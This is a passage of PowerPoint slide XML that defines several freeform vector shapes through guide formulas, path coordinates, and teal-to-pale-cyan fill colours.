                  <a:gd name="T42" fmla="*/ 2 w 27"/>
                  <a:gd name="T43" fmla="*/ 104 h 104"/>
                  <a:gd name="T44" fmla="*/ 4 w 27"/>
                  <a:gd name="T45" fmla="*/ 104 h 104"/>
                  <a:gd name="T46" fmla="*/ 6 w 27"/>
                  <a:gd name="T47" fmla="*/ 104 h 104"/>
                  <a:gd name="T48" fmla="*/ 7 w 27"/>
                  <a:gd name="T49" fmla="*/ 103 h 104"/>
                  <a:gd name="T50" fmla="*/ 9 w 27"/>
                  <a:gd name="T51" fmla="*/ 103 h 104"/>
                  <a:gd name="T52" fmla="*/ 11 w 27"/>
                  <a:gd name="T53" fmla="*/ 102 h 104"/>
                  <a:gd name="T54" fmla="*/ 13 w 27"/>
                  <a:gd name="T55" fmla="*/ 102 h 104"/>
                  <a:gd name="T56" fmla="*/ 15 w 27"/>
                  <a:gd name="T57" fmla="*/ 101 h 104"/>
                  <a:gd name="T58" fmla="*/ 18 w 27"/>
                  <a:gd name="T59" fmla="*/ 99 h 104"/>
                  <a:gd name="T60" fmla="*/ 20 w 27"/>
                  <a:gd name="T61" fmla="*/ 98 h 104"/>
                  <a:gd name="T62" fmla="*/ 22 w 27"/>
                  <a:gd name="T63" fmla="*/ 97 h 104"/>
                  <a:gd name="T64" fmla="*/ 25 w 27"/>
                  <a:gd name="T65" fmla="*/ 96 h 104"/>
                  <a:gd name="T66" fmla="*/ 27 w 27"/>
                  <a:gd name="T67" fmla="*/ 94 h 104"/>
                  <a:gd name="T68" fmla="*/ 27 w 27"/>
                  <a:gd name="T69" fmla="*/ 2 h 1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
                  <a:gd name="T106" fmla="*/ 0 h 104"/>
                  <a:gd name="T107" fmla="*/ 27 w 27"/>
                  <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                    <a:moveTo>
                      <a:pt x="27" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="93CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10775" name="Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1821" y="2330"/>
                <a:ext cx="22" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 22"/>
                  <a:gd name="T1" fmla="*/ 3 h 84"/>
                  <a:gd name="T2" fmla="*/ 22 w 22"/>
                  <a:gd name="T3" fmla="*/ 3 h 84"/>
                  <a:gd name="T4" fmla="*/ 21 w 22"/>
                  <a:gd name="T5" fmla="*/ 1 h 84"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 1 h 84"/>
                  <a:gd name="T8" fmla="*/ 20 w 22"/>
                  <a:gd name="T9" fmla="*/ 1 h 84"/>
                  <a:gd name="T10" fmla="*/ 19 w 22"/>
                  <a:gd name="T11" fmla="*/ 1 h 84"/>
                  <a:gd name="T12" fmla="*/ 18 w 22"/>
                  <a:gd name="T13" fmla="*/ 0 h 84"/>
                  <a:gd name="T14" fmla="*/ 17 w 22"/>
                  <a:gd name="T15" fmla="*/ 0 h 84"/>
                  <a:gd name="T16" fmla="*/ 15 w 22"/>
                  <a:gd name="T17" fmla="*/ 0 h 84"/>
                  <a:gd name="T18" fmla="*/ 14 w 22"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 12 w 22"/>
                  <a:gd name="T21" fmla="*/ 0 h 84"/>
                  <a:gd name="T22" fmla="*/ 10 w 22"/>
                  <a:gd name="T23" fmla="*/ 0 h 84"/>
                  <a:gd name="T24" fmla="*/ 8 w 22"/>
                  <a:gd name="T25" fmla="*/ 0 h 84"/>
                  <a:gd name="T26" fmla="*/ 6 w 22"/>
                  <a:gd name="T27" fmla="*/ 1 h 84"/>
                  <a:gd name="T28" fmla="*/ 4 w 22"/>
                  <a:gd name="T29" fmla="*/ 1 h 84"/>
                  <a:gd name="T30" fmla="*/ 3 w 22"/>
                  <a:gd name="T31" fmla="*/ 3 h 84"/>
                  <a:gd name="T32" fmla="*/ 0 w 22"/>
                  <a:gd name="T33" fmla="*/ 4 h 84"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 84 h 84"/>
                  <a:gd name="T36" fmla="*/ 0 w 22"/>
                  <a:gd name="T37" fmla="*/ 84 h 84"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 84 h 84"/>
                  <a:gd name="T40" fmla="*/ 1 w 22"/>
                  <a:gd name="T41" fmla="*/ 84 h 84"/>
                  <a:gd name="T42" fmla="*/ 3 w 22"/>
                  <a:gd name="T43" fmla="*/ 84 h 84"/>
                  <a:gd name="T44" fmla="*/ 4 w 22"/>
                  <a:gd name="T45" fmla="*/ 84 h 84"/>
                  <a:gd name="T46" fmla="*/ 5 w 22"/>
                  <a:gd name="T47" fmla="*/ 84 h 84"/>
                  <a:gd name="T48" fmla="*/ 6 w 22"/>
                  <a:gd name="T49" fmla="*/ 84 h 84"/>
                  <a:gd name="T50" fmla="*/ 7 w 22"/>
                  <a:gd name="T51" fmla="*/ 83 h 84"/>
                  <a:gd name="T52" fmla="*/ 10 w 22"/>
                  <a:gd name="T53" fmla="*/ 83 h 84"/>
                  <a:gd name="T54" fmla="*/ 11 w 22"/>
                  <a:gd name="T55" fmla="*/ 82 h 84"/>
                  <a:gd name="T56" fmla="*/ 13 w 22"/>
                  <a:gd name="T57" fmla="*/ 82 h 84"/>
                  <a:gd name="T58" fmla="*/ 14 w 22"/>
                  <a:gd name="T59" fmla="*/ 81 h 84"/>
                  <a:gd name="T60" fmla="*/ 17 w 22"/>
                  <a:gd name="T61" fmla="*/ 80 h 84"/>
                  <a:gd name="T62" fmla="*/ 19 w 22"/>
                  <a:gd name="T63" fmla="*/ 79 h 84"/>
                  <a:gd name="T64" fmla="*/ 20 w 22"/>
                  <a:gd name="T65" fmla="*/ 77 h 84"/>
                  <a:gd name="T66" fmla="*/ 22 w 22"/>
                  <a:gd name="T67" fmla="*/ 76 h 84"/>
                  <a:gd name="T68" fmla="*/ 22 w 22"/>
                  <a:gd name="T69" fmla="*/ 3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
                  <a:gd name="T106" fmla="*/ 0 h 84"/>
                  <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                    <a:moveTo>
                      <a:pt x="22" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A8D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10776" name="Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1822" y="2331"/>
                <a:ext cx="18" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 18"/>
                  <a:gd name="T1" fmla="*/ 2 h 66"/>
                  <a:gd name="T2" fmla="*/ 18 w 18"/>
                  <a:gd name="T3" fmla="*/ 2 h 66"/>
                  <a:gd name="T4" fmla="*/ 17 w 18"/>
                  <a:gd name="T5" fmla="*/ 2 h 66"/>
                  <a:gd name="T6" fmla="*/ 14 w 18"/>
                  <a:gd name="T7" fmla="*/ 0 h 66"/>
                  <a:gd name="T8" fmla="*/ 12 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 66"/>
                  <a:gd name="T10" fmla="*/ 10 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 66"/>
                  <a:gd name="T12" fmla="*/ 6 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 66"/>
                  <a:gd name="T14" fmla="*/ 3 w 18"/>
                  <a:gd name="T15" fmla="*/ 2 h 66"/>
                  <a:gd name="T16" fmla="*/ 0 w 18"/>
                  <a:gd name="T17" fmla="*/ 3 h 66"/>
                  <a:gd name="T18" fmla="*/ 0 w 18"/>
                  <a:gd name="T19" fmla="*/ 66 h 66"/>
                  <a:gd name="T20" fmla="*/ 0 w 18"/>
                  <a:gd name="T21" fmla="*/ 66 h 66"/>
                  <a:gd name="T22" fmla="*/ 2 w 18"/>
                  <a:gd name="T23" fmla="*/ 66 h 66"/>
                  <a:gd name="T24" fmla="*/ 4 w 18"/>
                  <a:gd name="T25" fmla="*/ 65 h 66"/>
                  <a:gd name="T26" fmla="*/ 6 w 18"/>
                  <a:gd name="T27" fmla="*/ 65 h 66"/>
                  <a:gd name="T28" fmla="*/ 9 w 18"/>
                  <a:gd name="T29" fmla="*/ 64 h 66"/>
                  <a:gd name="T30" fmla="*/ 12 w 18"/>
                  <a:gd name="T31" fmla="*/ 62 h 66"/>
                  <a:gd name="T32" fmla="*/ 14 w 18"/>
                  <a:gd name="T33" fmla="*/ 61 h 66"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 59 h 66"/>
                  <a:gd name="T36" fmla="*/ 18 w 18"/>
                  <a:gd name="T37" fmla="*/ 2 h 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
                  <a:gd name="T58" fmla="*/ 0 h 66"/>
                  <a:gd name="T59" fmla="*/ 18 w 18"/>
                  <a:gd name="T60" fmla="*/ 66 h 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 h="66">
                    <a:moveTo>
                      <a:pt x="18" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BCE5E5"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10777" name="Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1822" y="2333"/>
                <a:ext cx="14" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 45"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 45"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 45"/>
                  <a:gd name="T6" fmla="*/ 12 w 14"/>
                  <a:gd name="T7" fmla="*/ 0 h 45"/>
                  <a:gd name="T8" fmla="*/ 10 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 45"/>
                  <a:gd name="T10" fmla="*/ 9 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 45"/>
                  <a:gd name="T12" fmla="*/ 6 w 14"/>
                  <a:gd name="T13" fmla="*/ 0 h 45"/>
                  <a:gd name="T14" fmla="*/ 3 w 14"/>
                  <a:gd name="T15" fmla="*/ 0 h 45"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17" fmla="*/ 2 h 45"/>
                  <a:gd name="T18" fmla="*/ 0 w 14"/>
                  <a:gd name="T19" fmla="*/ 45 h 45"/>
                  <a:gd name="T20" fmla="*/ 2 w 14"/>
                  <a:gd name="T21" fmla="*/ 45 h 45"/>
                  <a:gd name="T22" fmla="*/ 2 w 14"/>
                  <a:gd name="T23" fmla="*/ 45 h 45"/>
                  <a:gd name="T24" fmla="*/ 4 w 14"/>
                  <a:gd name="T25" fmla="*/ 45 h 45"/>
                  <a:gd name="T26" fmla="*/ 5 w 14"/>
                  <a:gd name="T27" fmla="*/ 44 h 45"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 44 h 45"/>
                  <a:gd name="T30" fmla="*/ 10 w 14"/>
                  <a:gd name="T31" fmla="*/ 43 h 45"/>
                  <a:gd name="T32" fmla="*/ 12 w 14"/>
                  <a:gd name="T33" fmla="*/ 42 h 45"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 41 h 45"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1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45"/>
                  <a:gd name="T59" fmla="*/ 14 w 14"/>
                  <a:gd name="T60" fmla="*/ 45 h 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45">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D1F2F2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10778" name="Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1824" y="2333"/>
                <a:ext cx="9" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 1 h 27"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 27"/>
                  <a:gd name="T6" fmla="*/ 7 w 9"/>
                  <a:gd name="T7" fmla="*/ 1 h 27"/>
                  <a:gd name="T8" fmla="*/ 5 w 9"/>
                  <a:gd name="T9" fmla="*/ 0 h 27"/>
                  <a:gd name="T10" fmla="*/ 4 w 9"/>
                  <a:gd name="T11" fmla="*/ 0 h 27"/>
                  <a:gd name="T12" fmla="*/ 3 w 9"/>
                  <a:gd name="T13" fmla="*/ 1 h 27"/>
                  <a:gd name="T14" fmla="*/ 1 w 9"/>
                  <a:gd name="T15" fmla="*/ 1 h 27"/>
                  <a:gd name="T16" fmla="*/ 0 w 9"/>
                  <a:gd name="T17" fmla="*/ 2 h 27"/>
                  <a:gd name="T18" fmla="*/ 0 w 9"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 0 w 9"/>
                  <a:gd name="T21" fmla="*/ 27 h 27"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 27 h 27"/>
                  <a:gd name="T24" fmla="*/ 2 w 9"/>
                  <a:gd name="T25" fmla="*/ 27 h 27"/>
                  <a:gd name="T26" fmla="*/ 3 w 9"/>
                  <a:gd name="T27" fmla="*/ 27 h 27"/>
                  <a:gd name="T28" fmla="*/ 4 w 9"/>
                  <a:gd name="T29" fmla="*/ 27 h 27"/>
                  <a:gd name="T30" fmla="*/ 5 w 9"/>
                  <a:gd name="T31" fmla="*/ 25 h 27"/>
                  <a:gd name="T32" fmla="*/ 8 w 9"/>
                  <a:gd name="T33" fmla="*/ 24 h 27"/>
                  <a:gd name="T34" fmla="*/ 9 w 9"/>
                  <a:gd name="T35" fmla="*/ 23 h 27"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 1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27"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                    <a:moveTo>
                      <a:pt x="9" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E5FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10779" name="Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1934" y="2410"/>
                <a:ext cx="14" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 14"/>
                  <a:gd name="T1" fmla="*/ 14 h 14"/>
                  <a:gd name="T2" fmla="*/ 9 w 14"/>
                  <a:gd name="T3" fmla="*/ 14 h 14"/>
                  <a:gd name="T4" fmla="*/ 10 w 14"/>
                  <a:gd name="T5" fmla="*/ 13 h 14"/>
                  <a:gd name="T6" fmla="*/ 11 w 14"/>
                  <a:gd name="T7" fmla="*/ 13 h 14"/>
                  <a:gd name="T8" fmla="*/ 12 w 14"/>
                  <a:gd name="T9" fmla="*/ 11 h 14"/>
                  <a:gd name="T10" fmla="*/ 13 w 14"/>
                  <a:gd name="T11" fmla="*/ 10 h 14"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 9 h 14"/>
                  <a:gd name="T14" fmla="*/ 14 w 14"/>
                  <a:gd name="T15" fmla="*/ 8 h 14"/>
                  <a:gd name="T16" fmla="*/ 14 w 14"/>
                  <a:gd name="T17" fmla="*/ 7 h 14"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 6 h 14"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 4 h 14"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 3 h 14"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 2 h 14"/>
                  <a:gd name="T26" fmla="*/ 11 w 14"/>
                  <a:gd name="T27" fmla="*/ 1 h 14"/>
                  <a:gd name="T28" fmla="*/ 10 w 14"/>
                  <a:gd name="T29" fmla="*/ 0 h 14"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 0 h 14"/>
                  <a:gd name="T32" fmla="*/ 7 w 14"/>
                  <a:gd name="T33" fmla="*/ 0 h 14"/>
                  <a:gd name="T34" fmla="*/ 6 w 14"/>
                  <a:gd name="T35" fmla="*/ 0 h 14"/>
                  <a:gd name="T36" fmla="*/ 5 w 14"/>
                  <a:gd name="T37" fmla="*/ 0 h 14"/>
                  <a:gd name="T38" fmla="*/ 4 w 14"/>
                  <a:gd name="T39" fmla="*/ 1 h 14"/>
                  <a:gd name="T40" fmla="*/ 3 w 14"/>
                  <a:gd name="T41" fmla="*/ 2 h 14"/>
                  <a:gd name="T42" fmla="*/ 2 w 14"/>
                  <a:gd name="T43" fmla="*/ 3 h 14"/>
                  <a:gd name="T44" fmla="*/ 2 w 14"/>
                  <a:gd name="T45" fmla="*/ 4 h 14"/>
                  <a:gd name="T46" fmla="*/ 0 w 14"/>
                  <a:gd name="T47" fmla="*/ 6 h 14"/>
                  <a:gd name="T48" fmla="*/ 0 w 14"/>
                  <a:gd name="T49" fmla="*/ 7 h 14"/>
                  <a:gd name="T50" fmla="*/ 0 w 14"/>
                  <a:gd name="T51" fmla="*/ 8 h 14"/>
                  <a:gd name="T52" fmla="*/ 2 w 14"/>
                  <a:gd name="T53" fmla="*/ 9 h 14"/>
                  <a:gd name="T54" fmla="*/ 2 w 14"/>
